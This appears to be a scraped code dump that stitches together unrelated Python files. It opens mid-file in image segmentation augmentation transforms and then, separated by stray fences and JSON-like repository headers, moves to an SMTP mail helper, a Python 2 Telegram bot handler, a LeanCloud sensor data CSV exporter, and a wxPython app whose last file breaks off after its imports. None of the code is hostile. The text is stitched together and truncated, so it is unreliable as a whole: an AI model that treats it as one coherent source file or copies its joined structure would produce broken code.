sample1['labels_arr'] = np.pad(sample1['labels_arr'], [[h0, h1], [w0, w1]], mode='constant', constant_values=255)
if 'mask_arr' in sample0:
sample0['mask_arr'] = np.pad(sample0['mask_arr'], [[h0, h1], [w0, w1]], mode='constant')
sample1['mask_arr'] = np.pad(sample1['mask_arr'], [[h0, h1], [w0, w1]], mode='constant')
if 'xf_cv' in sample0:
pad_xlat = affine.translation_matrices(np.array([[w0, h0]]))
sample0['xf_cv'] = affine.cat_nx2x3(pad_xlat, sample0['xf_cv'][None, ...])[0]
sample1['xf_cv'] = affine.cat_nx2x3(pad_xlat, sample1['xf_cv'][None, ...])[0]
return (sample0, sample1)
class SegCVTransformRandomCrop (SegCVTransformPad):
def __init__(self, crop_size, crop_offset, rng=None):
if crop_offset is None:
crop_offset = [0, 0]
self.crop_size = np.array(crop_size)
self.crop_offset = np.array(crop_offset)
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
def transform_single(self, sample):
sample = self.pad_single(sample, self.crop_size)
image = sample['image_arr']
extra = np.array(image.shape[:2]) - self.crop_size
pos = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
sample['image_arr'] = image[pos[0]:pos[0]+self.crop_size[0], pos[1]:pos[1]+self.crop_size[1]]
if 'labels_arr' in sample:
sample['labels_arr'] = sample['labels_arr'][pos[0]:pos[0]+self.crop_size[0], pos[1]:pos[1]+self.crop_size[1]]
if 'mask_arr' in sample:
sample['mask_arr'] = sample['mask_arr'][pos[0]:pos[0] + self.crop_size[0], pos[1]:pos[1] + self.crop_size[1]]
if 'xf_cv' in sample:
sample['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(-pos[None, ::-1].astype(float)),
sample['xf_cv'][None, ...]
)[0]
return sample
def transform_pair(self, sample0, sample1):
# Pad the image if necessary
sample0, sample1 = self.pad_pair(sample0, sample1, self.crop_size)
# Randomly choose positions of each crop
extra = np.array(sample0['image_arr'].shape[:2]) - self.crop_size
pos0 = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
pos1 = pos0 + np.round(self.crop_offset * self.rng.uniform(-1.0, 1.0, size=(2,))).astype(int)
# Ensure pos1 cannot go out of bounds
pos1 = np.clip(pos1, np.array([0, 0]), extra)
# Extract crop and scale to target size
sample0['image_arr'] = sample0['image_arr'][pos0[0]:pos0[0] + self.crop_size[0], pos0[1]:pos0[1] + self.crop_size[1]]
sample1['image_arr'] = sample1['image_arr'][pos1[0]:pos1[0] + self.crop_size[0], pos1[1]:pos1[1] + self.crop_size[1]]
sample0['mask_arr'] = sample0['mask_arr'][pos0[0]:pos0[0] + self.crop_size[0], pos0[1]:pos0[1] + self.crop_size[1]]
sample1['mask_arr'] = sample1['mask_arr'][pos1[0]:pos1[0] + self.crop_size[0], pos1[1]:pos1[1] + self.crop_size[1]]
if 'labels_arr' in sample0:
sample0['labels_arr'] = sample0['labels_arr'][pos0[0]:pos0[0] + self.crop_size[0], pos0[1]:pos0[1] + self.crop_size[1]]
sample1['labels_arr'] = sample1['labels_arr'][pos1[0]:pos1[0] + self.crop_size[0], pos1[1]:pos1[1] + self.crop_size[1]]
if 'xf_cv' in sample0:
sample0['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(-pos0[None, ::-1]),
sample0['xf_cv'][None, ...]
)[0]
sample1['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(-pos1[None, ::-1]),
sample1['xf_cv'][None, ...]
)[0]
return (sample0, sample1)
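# --- Editor's illustrative usage sketch (not part of the original file) ---
# Samples are plain dicts; only 'image_arr' is required, while 'labels_arr',
# 'mask_arr' and 'xf_cv' are handled when present.
# sample = {'image_arr': np.zeros((512, 512, 3), dtype=np.uint8)}
# crop = SegCVTransformRandomCrop(crop_size=(256, 256), crop_offset=None)
# crop.transform_single(sample)['image_arr'].shape  # -> (256, 256, 3)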
class SegCVTransformRandomCropScaleHung (SegCVTransformPad):
"""
Random crop with random scale.
"""
def __init__(self, crop_size, crop_offset, uniform_scale=True, rng=None):
if crop_offset is None:
crop_offset = [0, 0]
self.crop_size = tuple(crop_size)
self.crop_size_arr = np.array(crop_size)
self.crop_offset = np.array(crop_offset)
self.uniform_scale = uniform_scale
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
def transform_single(self, sample0):
sample0 = sample0.copy()
scale_dim = 1 if self.uniform_scale else 2
# Draw scale factor
f_scale = 0.5 + self.rng.randint(0, 11, size=(scale_dim,)) / 10.0
# Scale the crop size by the inverse of the scale
sc_size = np.round(self.crop_size_arr / f_scale).astype(int)
sample0 = self.pad_single(sample0, sc_size)
image, labels, mask, xf = sample0['image_arr'], sample0.get('labels_arr'), sample0.get('mask_arr'), sample0.get('xf_cv')
# Randomly choose position
extra = np.array(image.shape[:2]) - sc_size
pos = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
# Extract crop and scale to target size
image = image[pos[0]:pos[0]+sc_size[0], pos[1]:pos[1]+sc_size[1]]
sample0['image_arr'] = cv2.resize(image, self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
if labels is not None:
labels = labels[pos[0]:pos[0]+sc_size[0], pos[1]:pos[1]+sc_size[1]]
sample0['labels_arr'] = cv2.resize(labels, self.crop_size[::-1], interpolation = cv2.INTER_NEAREST)
if mask is not None:
mask = mask[pos[0]:pos[0] + sc_size[0], pos[1]:pos[1] + sc_size[1]]
sample0['mask_arr'] = cv2.resize(mask, self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
if xf is not None:
# Matching `cv2.resize` requires:
# - scale factor of out_size/in_size
# - a translation of (scale_factor - 1) / 2
scale_factor_yx = self.crop_size_arr / sc_size
resize_xlat_yx = (scale_factor_yx - 1.0) * 0.5
sample0['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(resize_xlat_yx[None, ::-1].astype(float)),
affine.scale_matrices(scale_factor_yx[None, ::-1]),
affine.translation_matrices(-pos[None, ::-1].astype(float)),
xf[None, ...]
)[0]
return sample0
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
scale_dim = 1 if self.uniform_scale else 2
# Draw a scale factor for the second crop (crop1 from crop0,crop1)
f_scale1 = 0.5 + self.rng.randint(0, 11, size=(scale_dim,)) / 10.0
# Scale the crop size by the inverse of the scale
sc_size1 = np.round(self.crop_size_arr / f_scale1).astype(int)
# Compute the maximum crop size that we need
max_sc_size = np.maximum(self.crop_size_arr, sc_size1)
# Pad the image if necessary
sample0, sample1 = self.pad_pair(sample0, sample1, max_sc_size)
# Randomly choose positions of each crop
extra = np.array(sample0['image_arr'].shape[:2]) - max_sc_size
pos0 = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
pos1 = pos0 + np.round(self.crop_offset * self.rng.uniform(-1.0, 1.0, size=(2,))).astype(int)
# Ensure pos1 cannot go out of bounds
pos1 = np.clip(pos1, np.array([0, 0]), extra)
centre0 = pos0 + max_sc_size * 0.5
centre1 = pos1 + max_sc_size * 0.5
pos0 = np.round(centre0 - self.crop_size_arr * 0.5).astype(int)
pos1 = np.round(centre1 - sc_size1 * 0.5).astype(int)
# Extract crop and scale to target size
sample0['image_arr'] = sample0['image_arr'][pos0[0]:pos0[0] + self.crop_size_arr[0], pos0[1]:pos0[1] + self.crop_size_arr[1]]
sample1['image_arr'] = sample1['image_arr'][pos1[0]:pos1[0] + sc_size1[0], pos1[1]:pos1[1] + sc_size1[1]]
# image0 = cv2.resize(image0, self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
sample1['image_arr'] = cv2.resize(sample1['image_arr'], self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
if 'mask_arr' in sample0:
sample0['mask_arr'] = sample0['mask_arr'][pos0[0]:pos0[0] + self.crop_size_arr[0], pos0[1]:pos0[1] + self.crop_size_arr[1]]
sample1['mask_arr'] = sample1['mask_arr'][pos1[0]:pos1[0] + sc_size1[0], pos1[1]:pos1[1] + sc_size1[1]]
# mask0 = cv2.resize(mask0, self.crop_size[::-1], interpolation=cv2.INTER_NEAREST)
sample1['mask_arr'] = cv2.resize(sample1['mask_arr'], self.crop_size[::-1], interpolation=cv2.INTER_NEAREST)
if 'labels_arr' in sample0:
sample0['labels_arr'] = sample0['labels_arr'][pos0[0]:pos0[0] + self.crop_size_arr[0], pos0[1]:pos0[1] + self.crop_size_arr[1]]
sample1['labels_arr'] = sample1['labels_arr'][pos1[0]:pos1[0] + sc_size1[0], pos1[1]:pos1[1] + sc_size1[1]]
# labels0 = cv2.resize(labels0, self.crop_size[::-1], interpolation = cv2.INTER_NEAREST)
sample1['labels_arr'] = cv2.resize(sample1['labels_arr'], self.crop_size[::-1], interpolation = cv2.INTER_NEAREST)
if 'xf_cv' in sample0:
xf01 = np.stack([sample0['xf_cv'], sample1['xf_cv']], axis=0)
positions_xy = np.append(pos0[None, ::-1], pos1[None, ::-1], axis=0)
# Matching `cv2.resize` requires:
# - scale factor of out_size/in_size
# - a translation of (scale_factor - 1) / 2
scale_factors_xy = np.append(
np.array([[1, 1]]),
self.crop_size_arr[None, ::-1].astype(float) / sc_size1[None, ::-1],
axis=0
)
resize_xlats_xy = (scale_factors_xy - 1.0) * 0.5
xf01 = affine.cat_nx2x3(
affine.translation_matrices(resize_xlats_xy),
affine.scale_matrices(scale_factors_xy),
affine.translation_matrices(-positions_xy),
xf01,
)
sample0['xf_cv'] = xf01[0]
sample1['xf_cv'] = xf01[1]
return sample0, sample1
class SegCVTransformRandomCropRotateScale (SegCVTransformPad):
"""
Random crop with random scale and rotation.
"""
def __init__(self, crop_size, crop_offset, rot_mag, max_scale, uniform_scale=True, constrain_rot_scale=True,
rng=None):
if crop_offset is None:
crop_offset = [0, 0]
self.crop_size = tuple(crop_size)
self.crop_size_arr = np.array(crop_size)
self.crop_offset = np.array(crop_offset)
self.rot_mag_rad = math.radians(rot_mag)
self.log_max_scale = np.log(max_scale)
self.uniform_scale = uniform_scale
self.constrain_rot_scale = constrain_rot_scale
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
def transform_single(self, sample0):
sample0 = sample0.copy()
# Extract contents
image = sample0['image_arr']
# Choose scale and rotation
if self.uniform_scale:
scale_factor_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(1,)))
scale_factor_yx = np.repeat(scale_factor_yx, 2, axis=0)
else:
scale_factor_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(2,)))
rot_theta = self.rng.uniform(-self.rot_mag_rad, self.rot_mag_rad, size=(1,))
# Scale the crop size by the inverse of the scale
sc_size = self.crop_size_arr / scale_factor_yx
# Randomly choose centre
img_size = np.array(image.shape[:2])
extra = np.maximum(img_size - sc_size, 0.0)
centre = extra * self.rng.uniform(0.0, 1.0, size=(2,)) + np.minimum(sc_size, img_size) * 0.5
# Build affine transformation matrix
local_xf = affine.cat_nx2x3(
affine.translation_matrices(self.crop_size_arr[None, ::-1] * 0.5),
affine.rotation_matrices(rot_theta),
affine.scale_matrices(scale_factor_yx[None, ::-1]),
affine.translation_matrices(-centre[None, ::-1]),
)
# Reflect the image
# Use nearest neighbour sampling to stay consistent with labels, if labels present
if 'labels_arr' in sample0:
interpolation = cv2.INTER_NEAREST
else:
interpolation = self.rng.choice([cv2.INTER_NEAREST, cv2.INTER_LINEAR])
sample0['image_arr'] = cv2.warpAffine(image, local_xf[0], self.crop_size[::-1], flags=interpolation, borderValue=0, borderMode=cv2.BORDER_REFLECT_101)
# Don't reflect labels and mask
if 'labels_arr' in sample0:
sample0['labels_arr'] = cv2.warpAffine(sample0['labels_arr'], local_xf[0], self.crop_size[::-1], flags=cv2.INTER_NEAREST, borderValue=255, borderMode=cv2.BORDER_CONSTANT)
if 'mask_arr' in sample0:
sample0['mask_arr'] = cv2.warpAffine(sample0['mask_arr'], local_xf[0], self.crop_size[::-1], flags=interpolation, borderValue=0, borderMode=cv2.BORDER_CONSTANT)
if 'xf_cv' in sample0:
sample0['xf_cv'] = affine.cat_nx2x3(local_xf, sample0['xf_cv'][None, ...])[0]
return sample0
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
# Choose scales and rotations
if self.constrain_rot_scale:
if self.uniform_scale:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(1, 1)))
scale_factors_yx = np.repeat(scale_factors_yx, 2, axis=1)
else:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(1, 2)))
rot_thetas = self.rng.uniform(-self.rot_mag_rad, self.rot_mag_rad, size=(1,))
scale_factors_yx = np.repeat(scale_factors_yx, 2, axis=0)
rot_thetas = np.repeat(rot_thetas, 2, axis=0)
else:
if self.uniform_scale:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(2, 1)))
scale_factors_yx = np.repeat(scale_factors_yx, 2, axis=1)
else:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(2, 2)))
rot_thetas = self.rng.uniform(-self.rot_mag_rad, self.rot_mag_rad, size=(2,))
img_size = np.array(sample0['image_arr'].shape[:2])
# Scale the crop size by the inverse of the scale
sc_size = self.crop_size_arr / scale_factors_yx.min(axis=0)
crop_centre_pos = np.minimum(sc_size, img_size) * 0.5
# Randomly choose centres
extra = np.maximum(img_size - sc_size, 0.0)
centre0 = extra * self.rng.uniform(0.0, 1.0, size=(2,)) + crop_centre_pos
offset1 = np.round(self.crop_offset * self.rng.uniform(-1.0, 1.0, size=(2,)))
centre_xlat = np.stack([centre0, centre0], axis=0)
offset1_xlat = np.stack([np.zeros((2,)), offset1], axis=0)
# Build affine transformation matrices
local_xfs = affine.cat_nx2x3(
affine.translation_matrices(self.crop_size_arr[None, ::-1] * 0.5),
affine.translation_matrices(offset1_xlat[:, ::-1]),
affine.rotation_matrices(rot_thetas),
affine.scale_matrices(scale_factors_yx[:, ::-1]),
affine.translation_matrices(-centre_xlat[:, ::-1]),
)
# Use nearest neighbour sampling to stay consistent with labels, if labels present
interpolation = cv2.INTER_NEAREST if 'labels_arr' in sample0 else cv2.INTER_LINEAR
sample0['image_arr'] = cv2.warpAffine(sample0['image_arr'], local_xfs[0], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_REFLECT_101)
sample1['image_arr'] = cv2.warpAffine(sample1['image_arr'], local_xfs[1], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_REFLECT_101)
if 'labels_arr' in sample0:
sample0['labels_arr'] = cv2.warpAffine(sample0['labels_arr'], local_xfs[0], self.crop_size[::-1], flags=cv2.INTER_NEAREST,
borderValue=255, borderMode=cv2.BORDER_CONSTANT)
sample1['labels_arr'] = cv2.warpAffine(sample1['labels_arr'], local_xfs[1], self.crop_size[::-1], flags=cv2.INTER_NEAREST,
borderValue=255, borderMode=cv2.BORDER_CONSTANT)
if 'mask_arr' in sample0:
sample0['mask_arr'] = cv2.warpAffine(sample0['mask_arr'], local_xfs[0], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_CONSTANT)
sample1['mask_arr'] = cv2.warpAffine(sample1['mask_arr'], local_xfs[1], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_CONSTANT)
if 'xf_cv' in sample0:
xf01 = affine.cat_nx2x3(local_xfs, np.stack([sample0['xf_cv'], sample1['xf_cv']], axis=0))
sample0['xf_cv'] = xf01[0]
sample1['xf_cv'] = xf01[1]
return (sample0, sample1)
class SegCVTransformRandomFlip (SegTransform):
def __init__(self, hflip, vflip, hvflip, rng=None):
self.hflip = hflip
self.vflip = vflip
self.hvflip = hvflip
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
@staticmethod
def flip_image(img, flip_xyd):
if flip_xyd[0]:
img = img[:, ::-1]
if flip_xyd[1]:
img = img[::-1, ...]
if flip_xyd[2]:
img = np.swapaxes(img, 0, 1)
return img.copy()
def transform_single(self, sample):
sample = sample.copy()
# Flip flags
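# Each enabled flip (horizontal / vertical / transpose) is drawn independently with probability 0.5;
# disabled flips are masked out by the constructor flags.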
flip_flags_xyd = self.rng.binomial(1, 0.5, size=(3,)) != 0
flip_flags_xyd = flip_flags_xyd & np.array([self.hflip, self.vflip, self.hvflip])
sample['image_arr'] = self.flip_image(sample['image_arr'], flip_flags_xyd)
if 'mask_arr' in sample:
sample['mask_arr'] = self.flip_image(sample['mask_arr'], flip_flags_xyd)
if 'labels_arr' in sample:
sample['labels_arr'] = self.flip_image(sample['labels_arr'], flip_flags_xyd)
if 'xf_cv' in sample:
sample['xf_cv'] = affine.cat_nx2x3(
affine.flip_xyd_matrices(flip_flags_xyd, sample['image_arr'].shape[:2]),
sample['xf_cv'][None, ...],
)[0]
return sample
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
# Flip flags
flip_flags_xyd = self.rng.binomial(1, 0.5, size=(2, 3)) != 0
flip_flags_xyd = flip_flags_xyd & np.array([[self.hflip, self.vflip, self.hvflip]])
sample0['image_arr'] = self.flip_image(sample0['image_arr'], flip_flags_xyd[0])
sample1['image_arr'] = self.flip_image(sample1['image_arr'], flip_flags_xyd[1])
if 'mask_arr' in sample0:
sample0['mask_arr'] = self.flip_image(sample0['mask_arr'], flip_flags_xyd[0])
sample1['mask_arr'] = self.flip_image(sample1['mask_arr'], flip_flags_xyd[1])
if 'labels_arr' in sample0:
sample0['labels_arr'] = self.flip_image(sample0['labels_arr'], flip_flags_xyd[0])
sample1['labels_arr'] = self.flip_image(sample1['labels_arr'], flip_flags_xyd[1])
if 'xf_cv' in sample0:
# False -> 1, True -> -1
flip_scale_xy = flip_flags_xyd[:, :2] * -2 + 1
# Negative scale factors need to be combined with a translation whose value is (image_size - 1)
# Mask the translation with the flip flags to only apply it where flipping is done
flip_xlat_xy = flip_flags_xyd[:, :2] * (np.array([sample0['image_arr'].shape[:2][::-1],
sample1['image_arr'].shape[:2][::-1]]).astype(float) - 1)
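# For the transpose ('hv') flip, swapping the two rows of the 2x3 affine matrix swaps the x and y axes.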
hv_flip_xf = affine.identity_xf(2)
hv_flip_xf[flip_flags_xyd[:, 2]] = hv_flip_xf[flip_flags_xyd[:, 2], ::-1, :]
xf01 = np.stack([sample0['xf_cv'], sample1['xf_cv']], axis=0)
xf01 = affine.cat_nx2x3(
hv_flip_xf,
affine.translation_matrices(flip_xlat_xy),
affine.scale_matrices(flip_scale_xy),
xf01,
)
sample0['xf_cv'] = xf01[0]
sample1['xf_cv'] = xf01[1]
return (sample0, sample1)
class SegCVTransformNormalizeToTensor (SegTransform):
def __init__(self, mean, std):
self.mean = mean
self.std = std
def transform_single(self, sample):
sample = sample.copy()
# Convert image to float
image = img_as_float(sample['image_arr'])
if image.shape[2] == 4:
# Has alpha channel introduced by padding
# Split the image into RGB/alpha
alpha_channel = image[:, :, 3:4]
image = image[:, :, :3]
# Account for the alpha during standardisation
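# Padding pixels carry alpha == 0; scaling the mean by alpha keeps them at zero after
# standardisation (assuming the padded RGB values are zero) instead of shifting them to -mean/std.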
if self.mean is not None and self.std is not None:
image = (image - (self.mean[None, None, :] * alpha_channel)) / self.std[None, None, :]
else:
# Standardisation
if self.mean is not None and self.std is not None:
image = (image - self.mean[None, None, :]) / self.std[None, None, :]
# Convert to NCHW tensors
assert image.shape[2] == 3
sample['image'] = image.transpose(2, 0, 1).astype(np.float32)
del sample['image_arr']
if 'labels_arr' in sample:
sample['labels'] = sample['labels_arr'][None, ...].astype(np.int64)
del sample['labels_arr']
if 'mask_arr' in sample:
sample['mask'] = img_as_float(sample['mask_arr'])[None, ...].astype(np.float32)
del sample['mask_arr']
return sample
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
# Convert image to float
image0 = img_as_float(sample0['image_arr'])
image1 = img_as_float(sample1['image_arr'])
if image0.shape[2] == 4:
# Has alpha channel introduced by padding
# Split the image into RGB/alpha
alpha_channel0 = image0[:, :, 3:4]
image0 = image0[:, :, :3]
alpha_channel1 = image1[:, :, 3:4]
image1 = image1[:, :, :3]
# Account for the alpha during standardisation
if self.mean is not None and self.std is not None:
image0 = (image0 - (self.mean[None, None, :] * alpha_channel0)) / self.std[None, None, :]
image1 = (image1 - (self.mean[None, None, :] * alpha_channel1)) / self.std[None, None, :]
else:
# Standardisation
if self.mean is not None and self.std is not None:
image0 = (image0 - self.mean[None, None, :]) / self.std[None, None, :]
image1 = (image1 - self.mean[None, None, :]) / self.std[None, None, :]
# Convert to NCHW tensors
if image0.shape[2] != 3:
raise ValueError('image0 should have 3 channels, not {}'.format(image0.shape[2]))
if image1.shape[2] != 3:
raise ValueError('image1 should have 3 channels, not {}'.format(image1.shape[2]))
assert image1.shape[2] == 3
sample0['image'] = image0.transpose(2, 0, 1).astype(np.float32)
sample1['image'] = image1.transpose(2, 0, 1).astype(np.float32)
del sample0['image_arr']
del sample1['image_arr']
if 'mask_arr' in sample0:
sample0['mask'] = img_as_float(sample0['mask_arr'])[None, ...].astype(np.float32)
sample1['mask'] = img_as_float(sample1['mask_arr'])[None, ...].astype(np.float32)
del sample0['mask_arr']
del sample1['mask_arr']
if 'labels_arr' in sample0:
sample0['labels'] = sample0['labels_arr'][None, ...].astype(np.int64)
sample1['labels'] = sample1['labels_arr'][None, ...].astype(np.int64)
del sample0['labels_arr']
del sample1['labels_arr']
return (sample0, sample1)
``` |
{
"source": "Joker-ph/UIAutoDemo",
"score": 3
} |
#### File: UIAutoDemo/models/mail.py
```python
from seldom import SMTP
import time
# E-mail configuration
# user = '<EMAIL>'  # sender account
# password = '<PASSWORD>'  # sender authorisation code
# host = 'smtp.126.com'  # SMTP host
# to = '<EMAIL>'  # recipient; separate multiple addresses with commas ','
# subject = None
def sendMail(user, password, host, to, subject=None):
try:
smtp = SMTP(user=user, password=password, host=host)
time.sleep(3)
smtp.sender(to=to, subject=subject)
except Exception as error:
return error
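# Hypothetical usage (placeholder values, not real credentials):
# sendMail(user='<EMAIL>', password='<PASSWORD>', host='smtp.126.com',
#          to='<EMAIL>', subject='UI automation report')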
``` |
{
"source": "JokerQyou/bot",
"score": 2
} |
#### File: bot/botcommands/pi.py
```python
from config import pi_command
@pi_command
def pi(msg=None, debug=False):
pass
```
#### File: JokerQyou/bot/operations.py
```python
import json
import telegram
from rq.decorators import job
from redis_wrap import SYSTEMS
import config
import botcommands
from utils import *
bot = None
@job('reply', connection=SYSTEMS['default'], result_ttl=5)
def handle_update(update, telegram_bot=None):
global bot
if telegram_bot is None:
print 'no bot'
bot = telegram.Bot(token=config.TOKEN)
else:
bot = telegram_bot
message = update.message
# Save conversation info
conversations = config.get('conversations')
str_chat_id = smart_text(message.chat_id)
if message.left_chat_participant is not None:
if smart_text(
message.left_chat_participant.name[1:]
) == config.__name__:
del conversations[str_chat_id]
return
# Store chat info if it does not exist
if str_chat_id not in conversations:
if isinstance(message.chat, (telegram.User, )):
conversations[str_chat_id] = message.chat.name
elif isinstance(message.chat, (telegram.GroupChat, )):
conversations[str_chat_id] = message.chat.title
else:
# Update chat info if it changed
if isinstance(message.chat, (telegram.User, ))\
and smart_text(
message.chat.name
) != smart_text(conversations[str_chat_id]):
conversations[str_chat_id] = message.chat.name
elif isinstance(message.chat, (telegram.GroupChat, ))\
and smart_text(
message.chat.title
) != smart_text(conversations[str_chat_id]):
conversations[str_chat_id] = message.chat.title
if message.text:
text = message.text.strip()
if text.startswith('/'):
handle_command(text, message)
else:
handle_text(text, message)
elif message.photo:
pass
elif message.video:
pass
elif message.document:
pass
elif message.audio:
pass
elif message.location:
pass
def handle_command(text, message, debug=False):
# Admins can toggle debug mode for commands
if '/debug' in text \
and message.from_user.name in config.get('admins'):
debug = True
if '@' in text and config.__name__ not in text.split('@'):
return
command, options, words = extract_texts(message.text)
if not smart_text(command).isalnum():
return send_reply(text='机器人酱并不懂你发的那是什么玩意', message=message)  # "Bot-chan has no idea what that thing you sent is"
if command in ('ls', 'help', ):
return send_reply(text=list_commands(message, debug=debug),
message=message)
if hasattr(botcommands, command):
result = getattr(botcommands, command)(message, debug=debug)
if result is not None:
return send_reply(text=result, message=message)
if debug:
text = u'%s 命令现在并没有什么卯月' % command  # "The %s command is of no use right now"
send_reply(text=text, message=message)
@job('reply', connection=SYSTEMS['default'], result_ttl=5)
def handle_pi_command(msg_payload, telegram_bot=None):
global bot
if telegram_bot is None:
bot = telegram.Bot(token=config.TOKEN)
else:
bot = telegram_bot
try:
msg = json.loads(msg_payload)
reply_to = telegram.Message.de_json(msg['reply_to'])
return send_reply(text=msg.get('text', None),
photo=msg.get('photo', None),
emoji=msg.get('emoji', None),
audio=msg.get('audio', None),
video=msg.get('video', None),
location=msg.get('location', None),
message=reply_to)
except Exception:
try:
return send_plain_text(
text=msg.get('text', None),
photo=msg.get('photo', None),
message=reply_to
)
except Exception:
print extract_traceback()
def list_commands(msg, debug=False):
'''List all commands available'''
commands = []
for command in dir(botcommands):
attr = getattr(botcommands, command)
if callable(attr):
commands.append('%s - %s\n' % (command, attr.func_doc, ))
commands.append('help - 列出所有可用的命令')  # "help - list all available commands"
return ''.join(commands)
def handle_text(text, message):
text = u'%s: %s' % (u'复读机', text, )  # u'复读机' means "parrot" (echo the message back)
# send_reply(text=text, message=message)
def send_plain_text(text=None, photo=None, message=None, reply=True):
if photo and 'http' in photo:
content = photo
elif text:
content = text
bot.sendChatAction(chat_id=message.chat_id,
action='typing')
bot.sendMessage(message.chat_id,
smart_text(content),
reply_to_message_id=message.message_id)
def send_reply(text=None, photo=None, emoji=None,
audio=None, video=None, fileobj=None,
location=None, message=None, reply=True):
if not message:
raise RuntimeError("Don't know the chat id")
# Text and photo replies are sent; other media types only set the matching chat action before a text reply
action = 'typing'
if photo:
action = 'upload_photo'
bot.sendChatAction(chat_id=message.chat_id,
action=action)
bot.sendPhoto(message.chat_id,
photo,
reply_to_message_id=message.message_id)
return
elif audio:
action = 'upload_audio'
elif video:
action = 'upload_video'
elif fileobj:
action = 'upload_document'
elif location:
action = 'find_location'
bot.sendChatAction(chat_id=message.chat_id,
action=action)
bot.sendMessage(message.chat_id,
smart_text(text),
reply_to_message_id=message.message_id)
``` |
{
"source": "JokerQyou/env.data",
"score": 3
} |
#### File: JokerQyou/env.data/export.py
```python
import csv
from datetime import datetime
import os
import sys
import click
from dotenv import load_dotenv
import leancloud
from loguru import logger
load_dotenv()
logger.remove()
logger.add(
sys.stdout,
format='<green>{time:YYYY-MM-DD HH:mm:ss}</green> <level>{level: <8}</level> <level>{message}</level>',
level='INFO',
)
def export_month_data(year, month):
start = datetime(year, month, 1)
if month == 12: # Last month of the year
end = datetime(year + 1, 1, 1)
else:
end = datetime(year, month + 1, 1)
EnvSnap = leancloud.Object.extend('EnvSnap')
logger.info('Querying {} data in range of [{}, {})', 'EnvSnap', start, end)
query = EnvSnap.query
query.greater_than_or_equal_to('createdAt', start)
query.less_than('createdAt', end)
query.add_ascending('createdAt')
data_count = query.count()
if data_count:
logger.info('{} rows of data', data_count)
else:
logger.info('No data for {:04d}-{:02d}', year, month)
return
# Pagination
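# A single LeanCloud query returns at most 1000 objects (the service's per-query cap),
# so fetch the remaining rows in pages by advancing skip().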
data = []
query.limit(1000)
while len(data) < data_count:
query.skip(len(data))
new_data = query.find()
logger.info('Fetched {} rows of data', len(new_data))
data.extend(new_data)
foldername = os.path.join('{:04d}'.format(year), '{:02d}'.format(month))
logger.info('Data will be saved to {}', foldername)
if not os.path.isdir(foldername):
os.makedirs(foldername)
for target in ('temperature', 'pressure', 'humidity'):
filename = os.path.join(foldername, '{}.csv'.format(target))
with open(filename, 'w', newline='') as wf:
writer = csv.writer(wf)
writer.writerow(['Timestamp', target.capitalize()]) # Header
for item in data:
writer.writerow([
item.created_at.timestamp(),
item.get(target),
])
logger.info('{} data saved to {}', target.capitalize(), filename)
@click.command()
@click.argument('year', type=int, required=True)
@click.argument('month', type=int, required=True)
@click.option('--appid', required=True, envvar='APP_ID')
@click.option('--appkey', required=True, envvar='APP_KEY')
@click.option('--username', required=True, envvar='L_USER')
@click.option('--password', required=True, envvar='L_PAWD')
def main(year, month, appid, appkey, username, password):
leancloud.init(appid, appkey)
user = leancloud.User()
user.login(username, password)
logger.info('User login OK')
export_month_data(year, month)
user.logout()
logger.info('User logged out')
if __name__ == '__main__':
main()
``` |
{
"source": "JokerQyou/ModderZ",
"score": 2
} |
#### File: modder/gui/app.py
```python
from queue import Empty
import threading
import wx
import modder
import modder.manager
from .trayicon import TrayIcon
class ModderGuiApp(wx.App):
def OnInit(self):
modder.GUI_MODE = True
self._manager = modder.manager.ModManager()
self._tray = TrayIcon()
self._timer_stop_event = threading.Event()
self._timer_thread = modder.TimerThread(modder.EVENT_QUEUE, self._timer_stop_event)
self._timer_thread.daemon = True
self._timer_thread.start()
self._modder_thread = threading.Thread(
target=self._process_mod_event_queue, name='Modder.wxApp.ModderThread'
)
self._modder_thread.daemon = True
modder.EVENT_QUEUE.put_nowait(('Modder.Started', None))
self._modder_thread.start()
return True
def _process_mod_event_queue(self):
while 1:
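# Wait at most one second for an event so this daemon thread wakes up regularly
# instead of blocking forever on an empty queue.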
try:
event_name, event_data = modder.EVENT_QUEUE.get(timeout=1)
except Empty:
pass
else:
self._manager.trigger(event_name, data=event_data)
def OnExit(self):
self._timer_stop_event.set()
self._manager.trigger('Modder.BeforeQuit')
return 0
```
#### File: gui/graph/models.py
```python
import numpy as N
import wx
from wx.lib.floatcanvas import FloatCanvas as FC
